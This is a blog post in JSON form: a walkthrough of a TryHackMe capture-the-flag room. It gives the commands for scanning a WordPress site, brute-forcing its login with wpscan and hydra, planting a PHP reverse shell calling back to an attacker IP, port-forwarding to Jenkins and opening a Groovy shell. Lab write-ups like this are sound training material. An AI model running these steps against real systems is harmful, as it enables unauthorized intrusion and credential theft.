{"id":131915,"date":"2023-02-17T19:26:02","date_gmt":"2023-02-17T19:26:02","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1141940"},"modified":"2023-02-17T19:26:02","modified_gmt":"2023-02-17T19:26:02","slug":"tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/02\/17\/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress\/","title":{"rendered":"TryHackMe \u2013 How I Used WPScan to Extract Login Credentials (WordPress)"},"content":{"rendered":"\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-top\" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1141940&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\\\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n<div class=\"kksr-stars\">\n<div class=\"kksr-stars-inactive\">\n<div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"kksr-stars-active\" style=\"width: 142.5px;\">\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<div class=\"kksr-star\" style=\"padding-right: 5px\">\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\"> 5\/5 &#8211; (1 vote) <\/div>\n<\/p><\/div>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXF3NcIh8C9w%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>CTF Creator: <\/strong><a rel=\"noreferrer noopener\" href=\"https:\/\/tryhackme.com\/p\/TheMayor\" target=\"_blank\"><strong>TheMayor<\/strong><\/a><\/li>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/internal\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/internal<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Hard<\/li>\n<li><strong>Target<\/strong>: Root\/User flags<\/li>\n<li><strong>Highlight<\/strong>: Enumerating a wordpress site with wpscan<\/li>\n<li><strong>Tools used<\/strong>: <code>pentest.ws<\/code>, <code>hydra<\/code>, <code>nmap<\/code>, <code>dirb<\/code>, <code>linpeas<\/code>, <code>ssh<\/code> with <a href=\"https:\/\/blog.finxter.com\/tryhackme-badbyte-walkthrough-how-i-used-port-forwarding-to-hack-into-an-internal-sites-server\/\" data-type=\"post\" data-id=\"1041685\" target=\"_blank\" rel=\"noreferrer noopener\">port forwarding<\/a><\/li>\n<li><strong>Tags<\/strong>: <em>CTF, security, accessible, pentest, blackbox<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"941\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249.png\" alt=\"\" class=\"wp-image-1142194\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249.png 624w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249-199x300.png 199w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/figure>\n<\/div>\n<p>This CTF challenge is another blackbox-style pentest where we don\u2019t know anything about our target other than the IP address. <\/p>\n<p>We will have to discover ports and services running on the server with our standard pentesting tools like <code>nmap<\/code> and <code>dirb<\/code> scan. We also don\u2019t have any inside information about the backend of the target machine. <\/p>\n<p>Let\u2019s get started!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"840\" height=\"474\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237.png\" alt=\"\" class=\"wp-image-1141967\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237.png 840w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237-300x169.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237-768x433.png 768w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll be testing out the website <code>pentest.ws<\/code> during today\u2019s video walkthrough. <\/p>\n<p>It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports). <\/p>\n<p>At the end of this post, I will summarize my thoughts on using <code>pentest.ws<\/code> for the first time.<\/p>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"735\" height=\"481\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250.png\" alt=\"\" class=\"wp-image-1142210\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250.png 735w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250-300x196.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo nmap -A -oX nmap.txt $targetIP -p-<\/pre>\n<p>Today we are exporting our <code>nmap<\/code> results in <a href=\"https:\/\/blog.finxter.com\/parsing-xml-files-in-python-a-simple-guide\/\" data-type=\"post\" data-id=\"883225\" target=\"_blank\" rel=\"noreferrer noopener\">XML<\/a> format so that we can upload them to <code>pentest.ws<\/code> and have the site automatically parse our findings.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">dirb http:\/\/$targetIP -o dirb.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"517\" height=\"192\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238.png\" alt=\"\" class=\"wp-image-1141980\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238.png 517w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238-300x111.png 300w\" sizes=\"auto, (max-width: 517px) 100vw, 517px\" \/><\/figure>\n<\/div>\n<p>We discovered a WordPress login at: <a href=\"http:\/\/internal.thm\/blog\/wp-login.php\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/internal.thm\/blog\/wp-login.php<\/a><\/p>\n<h2>USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS<\/h2>\n<p>Let\u2019s use <code>wpscan<\/code> to discover the admin\u2019s email and password for WordPress.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wpscan --url 10.10.61.252\/blog -e vpn,u -o wpscan.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"826\" height=\"330\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239.png\" alt=\"\" class=\"wp-image-1141988\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239.png 826w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239-300x120.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239-768x307.png 768w\" sizes=\"auto, (max-width: 826px) 100vw, 826px\" \/><\/figure>\n<\/div>\n<p>Now that we found a username, we can run <code>wpscan<\/code> again with a wordlist to brute-force the password.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wpscan --url 10.10.61.262\/blog --usernames admin --passwords \/home\/kalisurfer\/hacking-tools\/rockyou.txt --max-threads 50 -o wpscan-passwds.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"727\" height=\"640\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240.png\" alt=\"\" class=\"wp-image-1141991\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240.png 727w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240-300x264.png 300w\" sizes=\"auto, (max-width: 727px) 100vw, 727px\" \/><\/figure>\n<\/div>\n<p>We found the admin email and password!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">admin:my2boys<\/pre>\n<p>Now we can log into WordPress and look for a place to upload a <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"post\" data-id=\"1118920\" target=\"_blank\" rel=\"noreferrer noopener\">revshell<\/a>.<\/p>\n<h2>INITIAL FOOTHOLD &#8211; SPAWN A REVSHELL BY EDITING 404.PHP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"647\" height=\"528\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241.png\" alt=\"\" class=\"wp-image-1141996\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241.png 647w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241-300x245.png 300w\" sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll edit the template for <code>404.php<\/code> and drop in a revshell created quickly and easily with EzpzShell.py. <\/p>\n<p>If you want to learn more about <strong><code>ezpzshell<\/code><\/strong>, check out my previous blog post:<\/p>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Learn More<\/strong>: <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" target=\"_blank\" rel=\"noreferrer noopener\">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation<\/a><\/p>\n<p><code>ezpz 10.6.2.23 8888 php<\/code> (<code>ezpzshell<\/code> also automatically starts a listener)<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"404\" height=\"238\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242.png\" alt=\"\" class=\"wp-image-1142014\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242.png 404w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242-300x177.png 300w\" sizes=\"auto, (max-width: 404px) 100vw, 404px\" \/><\/figure>\n<\/div>\n<p>After copying the payload to <code>404.php<\/code>, we make sure it is saved and then trigger the payload:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/internal.thm\/wordpress\/wp-content\/themes\/twentyseventeen\/404.php<\/pre>\n<p>And if everything is set up correctly, we will catch the revshell with <code>ezpz<\/code> as user: <code>www-data<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"407\" height=\"177\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243.png\" alt=\"\" class=\"wp-image-1142019\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243.png 407w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243-300x130.png 300w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/figure>\n<\/div>\n<h2>STABILIZE THE SHELL<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"738\" height=\"488\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251.png\" alt=\"\" class=\"wp-image-1142219\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251.png 738w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251-300x198.png 300w\" sizes=\"auto, (max-width: 738px) 100vw, 738px\" \/><\/figure>\n<\/div>\n<p>The following command will stabilize the shell:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"411\" height=\"177\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247.png\" alt=\"\" class=\"wp-image-1142078\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247.png 411w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247-300x129.png 300w\" sizes=\"auto, (max-width: 411px) 100vw, 411px\" \/><\/figure>\n<\/div>\n<h2>INTERNAL ENUMERATION &#8211; FIND USER CREDS<\/h2>\n<p>We discover a txt file with credentials:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat wp-save.txt Bill,\nAubreanna needed these credentials for something later. Let her know you have them and where they are.\naubreanna:bubb13guM!@#123\n<\/pre>\n<p>Let\u2019s try switching users to <code>aubreanna<\/code> with the password given in <code>wp-save.txt<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su aubreanna<\/pre>\n<p>We are in as user <code>aubreanna<\/code> and immediately find the user flag.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">aubreanna@internal:~$ cat us cat user.txt THM{i\u2014------omitted--------1}\n<\/pre>\n<h2>MORE ENUMERATION &#8211; DISCOVER A JENKINS SERVICE<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080\n<\/pre>\n<h2>SET UP PORT FORWARDING VIA SSH LOGIN<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"735\" height=\"480\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252.png\" alt=\"\" class=\"wp-image-1142227\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252.png 735w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252-300x196.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"570\" height=\"631\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246.png\" alt=\"\" class=\"wp-image-1142074\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246.png 570w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246-271x300.png 271w\" sizes=\"auto, (max-width: 570px) 100vw, 570px\" \/><\/figure>\n<\/div>\n<p>SUCCESS! WE&#8217;VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the <a href=\"https:\/\/blog.finxter.com\/tryhackme-alfred-how-i-solved-the-challenge\/\" data-type=\"post\" data-id=\"1000191\" target=\"_blank\" rel=\"noreferrer noopener\">Jenkins<\/a> login page in our browser.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"781\" height=\"672\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245.png\" alt=\"\" class=\"wp-image-1142071\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245.png 781w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245-300x258.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245-768x661.png 768w\" sizes=\"auto, (max-width: 781px) 100vw, 781px\" \/><\/figure>\n<\/div>\n<h2>BRUTE-FORCE THE LOGIN<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"741\" height=\"487\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253.png\" alt=\"\" class=\"wp-image-1142235\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253.png 741w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253-300x197.png 300w\" sizes=\"auto, (max-width: 741px) 100vw, 741px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">hydra -l admin -P \/home\/kalisurfer\/hacking-tools\/SecLists\/Passwords\/Leaked-Databases\/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '\/j_acegi_security_check:j_username=admin&amp;j_password=^PASS^&amp;from=%2F&amp;Submit=Sign+in&amp;login=:Invalid username or password'<\/pre>\n<p>The payload on this command has three parts:<\/p>\n<ol>\n<li><code>http-post-form<\/code> + <code>header<\/code><\/li>\n<li>the request, edited with admin as the username and <code>^PASS^<\/code> in place of the password to mark it as the variable for the password wordlist<\/li>\n<li>the error message that the website will return with a wrong password\u00a0<\/li>\n<\/ol>\n<p><strong>Output:<\/strong><\/p>\n<pre class=\"wp-block-preformatted\"><code>Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.\nHydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\\\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2023-02-06 08:57:08\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1\/p:59185), ~3700 tries per task\n[DATA] attacking http-post-form:\/\/127.0.0.1:8080\/j_acegi_security_check:j_username=admin&amp;j_password=^PASS^&amp;from=%2F&amp;Submit=Sign+in&amp;login=:Invalid username or password\n[STATUS] 396.00 tries\/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active\n[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2023-02-06 08:58:10<\/code>\n<\/pre>\n<\/p>\n<p>Credentials found! <code>admin:spongebob<\/code><\/p>\n<h2>ENUMERATING JENKINS AS ADMIN<\/h2>\n<p>We\u2019ll use the script console on Jenkins to spawn another revshell using <em>groovy scripting language<\/em>. <\/p>\n<p>We\u2019ll use <code>ezpzshell<\/code> and choose the Java code, because <em>groovy <\/em>is built on Java. This time when we catch it, we will be user <code>jenkins<\/code>. <\/p>\n<p>Manually enumerating through the file system we stumble across a <code>note.txt<\/code>. Let\u2019s check out the contents:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat note.txt<\/pre>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123\n<\/code><\/pre>\n<p>Bingo! We found root user credentials!&nbsp;<\/p>\n<h2>SWITCH USERS TO ROOT<\/h2>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su root\nroot@internal:~# cat root.txt\nTHM{d\u2014-omitted\u20143r}\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"403\" height=\"208\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244.png\" alt=\"\" class=\"wp-image-1142068\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244.png 403w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244-300x155.png 300w\" sizes=\"auto, (max-width: 403px) 100vw, 403px\" \/><\/figure>\n<\/div>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"707\" height=\"943\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254.png\" alt=\"\" class=\"wp-image-1142241\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254.png 707w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254-225x300.png 225w\" sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/figure>\n<\/div>\n<p>I\u2019m not convinced yet that <code>pentest.ws<\/code> will save me much time on my note taking. Maybe with time and experience it would help. <\/p>\n<p>I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform. <\/p>\n<p>However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords. <\/p>\n<p>Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.<\/p>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Recommended<\/strong>: <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" target=\"_blank\" rel=\"noreferrer noopener\">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW CTF Creator: TheMayor Link: https:\/\/tryhackme.com\/room\/internal Difficulty: Hard Target: Root\/User flags Highlight: Enumerating a wordpress site with wpscan Tools used: pentest.ws, hydra, nmap, dirb, linpeas, ssh with port forwarding Tags: CTF, security, accessible, pentest, blackbox BACKGROUND This CTF challenge is another blackbox-style pentest where we don\u2019t know anything about our [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131915","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131915","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131915"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131915\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131915"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131915"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131915"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}